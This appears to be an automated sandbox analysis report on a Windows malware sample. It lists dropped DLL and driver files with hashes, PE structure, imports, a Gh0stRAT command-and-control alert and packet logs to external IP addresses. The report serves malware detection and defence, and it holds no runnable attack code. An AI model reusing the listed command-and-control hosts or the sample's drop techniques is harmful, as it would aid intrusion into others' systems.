SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002082912042394
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fz:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gz
MD5:	71DAABA939A35FABA25DB29B07A9EB0A
SHA1:	B0966F7786EBB99550B490929D30F22D6C1FC012
SHA-256:	CB434218E934899250A6C468B954AC928C41C6B27B2ECB9CB9EFE533116A0B55
SHA-512:	D7744A70D904ED031463F10F9607ACDABBDBA3E3BB05E14620C1D67F6DB0F52878E7BD3D5B2FFFBFDE86780CD708A10C7926BB1FFE5F36DC5542C03A2DD3FB4B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.228885003597689
Encrypted:	false
SSDEEP:	384:H3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/0:HOUkgfdZ9pRyv+uPzCMHo3q4tDghy
MD5:	4885B35CEFB232C990702F79012875CC
SHA1:	C68D09A3528E0F39524B20CC16E161D19A2D584A
SHA-256:	ED6E0D87074397B3FFCC37DDDD8037528C259FE64E838939D71A08A9EFC9665E
SHA-512:	AA625B1EA3BC89282D2B2F8B43E4E077858A6004D9976D5622E5D3604A0905B19BF6AEEE55A711358238066D80D8547C7DE94AEF8749826C6B0C1FAB9B74D860
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l..........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\byHW9q\byHW9q.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	296
Entropy (8bit):	4.4476459429341855
Encrypted:	false
SSDEEP:	3:ri9LH9vl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsljti4vv2lKsXmAUWKznl6:ri9LbTwPYtyjtOsJQ4GEsXmGoi/vL
MD5:	CA87F207893F75010994228898C73551
SHA1:	CA58C747F52978584BF8D38DCF8579DB911D929D
SHA-256:	5B42D55FB0CBEF62CF9F3C1DB19145916A2305D5B810AA3BE64BC9B5D5A0DD6A
SHA-512:	7E81FF116DE58A24A9DA2C28F86288059753ABE372730407DEA3A2ECDB538104C22651DF8A3BA2071C3309FA6B63AC530163F626CB11FA9750DC200B0F894032
Malicious:	false
Preview:	..........8.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP............./.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.... ....?7.y..\|...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	0.08370096109724737
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2976587-987347589.08.exe
File size:	30'887'936 bytes
MD5:	3f0d4ac83e0bec29aebc666ff027a5d6
SHA1:	0e8432e8855e31eca680181b961852deaba74ee8
SHA256:	857bcee55a11cc0dd14006a38bd0ca0a8d7f88ea6018219b55ff797cddccea95
SHA512:	49ed733c32e8bfef970fd1a33d71905c51be82f6afd6aa6a573464f5d8a8c14d01af79cf9a98a2dbdaa8b977cfcc739fd987814feb251c54dc8a2f96658d317f
SSDEEP:	3072:654rQk5rIYRl8YLiVeUeqH+WEwugQyXY2YHFkc1e5evFBDwRucQyTvRBsmuB:I4rUKDLiVeUhEFeYHt1e5evDw/K
TLSH:	F767AD1B77E070F9E1B69678C8125649D772B8331731AB9F03A44286DF376D18D3AB22
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X.E.X.E.X.E.:.D.X.E.:.D.X.E.:.D"X.E...D.X.E...D.X.E...D.X.E...E.X.E.X.E.X.E5..D.X.E5..D.X.ERich.X.E........PE..d...%IWe...

File Icon


Icon Hash:	338ed4d4a2726922

Static PE Info

General

Entrypoint:	0x140004988
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
Time Stamp:	0x65574925 [Fri Nov 17 11:06:13 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	0f7cdde37f1462484539e0138cfa1fe2

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F9EC4D90FD8h
dec eax
add esp, 28h
jmp 00007F9EC4D8D240h
int3
int3
jmp 00007F9EC4D93480h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
jmp 00007F9EC4D90B83h
dec eax
mov ecx, ebx
call 00007F9EC4D93486h
test eax, eax
jne 00007F9EC4D90B74h
dec eax
cmp ebx, FFFFFFFFh
jne 00007F9EC4D90B69h
call 00007F9EC4D914E7h
jmp 00007F9EC4D90B67h
call 00007F9EC4D914C0h
dec eax
mov ecx, ebx
call 00007F9EC4D934CCh
dec eax
test eax, eax
je 00007F9EC4D90B37h
dec eax
add esp, 20h
pop ebx
ret
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [0000A6CFh]
dec eax
mov ecx, ebx
call dword ptr [0000A6BEh]
call dword ptr [0000A6C8h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [0000A6BCh]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call 00007F9EC4D9A0BCh
test eax, eax
je 00007F9EC4D90B69h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [00014FF7h]
call 00007F9EC4D90C0Fh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [000150DEh], eax
dec eax
lea eax, dword ptr [esp+38h]

Rich Headers

Programming Language:

[C++] VS2015 UPD3.1 build 24215
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17734	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d76000	0x4abc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d74000	0xcc0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d7b000	0x630	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x165d0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x16630	0x94	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xd350	0xd400	042ff524705fa2abd71cba2c4f95f8fe	False	0.5641214622641509	data	6.363076025733495	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x904e	0x9200	909112f6547c8c223b9d09d4e73580ce	False	0.4260755565068493	data	4.707335187064855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x1d5ac68	0x1d58200	ab2455c660e8e10120efea481bddb2e9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1d74000	0xcc0	0xe00	f0027954b09b335b4fb4c14137971ffd	False	0.44363839285714285	data	4.49612119040806	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x1d75000	0xc4	0x200	bdbf77d4bf01cbf4f15fd100a268f74c	False	0.21875	Matlab v4 mat-file (little endian) q, numeric, rows 10, columns 13, imaginary	0.9798152519205301	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1d76000	0x4abc	0x4c00	c3521f000215b739b35a6f6b2ba17189	False	0.9590357730263158	data	7.924423626369639	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1d7b000	0x630	0x800	0c3c3adbfa1d7560de091d1d1029dad6	False	0.537109375	data	4.797113422033704	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1d76118	0x490d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9856692155499706
RT_RCDATA	0x1d7aa28	0x7c	data	English	United States	0.6370967741935484
RT_RCDATA	0x1d7aaa4	0x2	data	English	United States	5.0
RT_GROUP_ICON	0x1d7aaa8	0x14	data	English	United States	1.05

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesW, CloseHandle, GetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, SizeofResource, LoadLibraryW, FindResourceW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, VirtualAlloc
USER32.dll	wsprintfW, MessageBoxW
SHELL32.dll	ShellExecuteExW
SHLWAPI.dll	PathCombineW, PathRemoveFileSpecW, PathCanonicalizeW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T04:45:15.425167+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.9	49987	8.217.47.169	8917	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:43:41.524554968 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:41.524669886 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:41.524779081 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:41.545171976 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:41.545223951 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:42.797276974 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:42.797369957 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:42.798367977 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:42.798443079 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:42.863233089 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:42.863249063 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:42.863790035 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:42.866013050 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:42.867485046 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:42.911351919 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:43.187978983 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:43.188108921 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:43.188133955 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:43.188169003 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:43.195024967 CET	49973	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:43.195049047 CET	443	49973	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:43.316402912 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:43.316507101 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:43.316615105 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:43.316942930 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:43.316976070 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.573102951 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.573183060 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.576857090 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.576865911 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.576911926 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.576915979 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.907015085 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.907044888 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.907180071 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.907247066 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.907330036 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.907586098 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.907651901 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.910629034 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.910722971 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.912867069 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.912964106 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.997591019 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.997747898 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.997782946 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.997843027 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.997920990 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.997988939 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.998308897 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.998409986 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.999435902 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.999500036 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:44.999804974 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:44.999871016 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.001210928 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.001276970 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.012204885 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.012294054 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.012294054 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.012320042 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.012346983 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.012377024 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.012398958 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.012454033 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.087909937 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.088011980 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.088210106 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.088285923 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.088301897 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.088371992 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.088917971 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.088998079 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.089025974 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.089050055 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.089087009 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.089112997 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.089641094 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.089720011 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.089766026 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.089834929 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.090508938 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.090579033 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.090728045 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.090795040 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.091077089 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.091145039 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.091197014 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.091260910 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.092026949 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.092101097 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.092113018 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.092133045 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.092173100 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.092192888 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.102688074 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.102770090 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.102844954 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.102884054 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.102931976 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.102932930 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.102966070 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.103025913 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.178503036 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.178606033 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.178631067 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.178689957 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.178725004 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.178781986 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.178821087 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.178874016 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.178883076 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.178925991 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.178973913 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.179024935 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.180586100 CET	49974	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.180603981 CET	443	49974	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.241571903 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.241684914 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:45.241797924 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.242043972 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:45.242078066 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.497109890 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.497248888 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.497849941 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.497869015 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.498058081 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.498070955 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.834409952 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.834429026 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.834533930 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.834563971 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.834645987 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.834686995 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.834722042 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.835143089 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.835226059 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.835792065 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.835861921 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:46.928792953 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:46.928890944 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.070540905 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.070759058 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.070832014 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.070832014 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.070911884 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.070992947 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.091085911 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.091320992 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.102952957 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.103060007 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.126754999 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.126883984 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.138087988 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.138273001 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.149794102 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.149882078 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.173171043 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.173393965 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.184809923 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.184905052 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.208451986 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.208688974 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.220037937 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.220136881 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.304583073 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.304712057 CET	49975	443	192.168.2.9	39.103.20.105
Jan 11, 2025 04:43:47.315845013 CET	443	49975	39.103.20.105	192.168.2.9
Jan 11, 2025 04:43:47.315973997 CET	443	49975	39.103.20.105	192.168.2.9
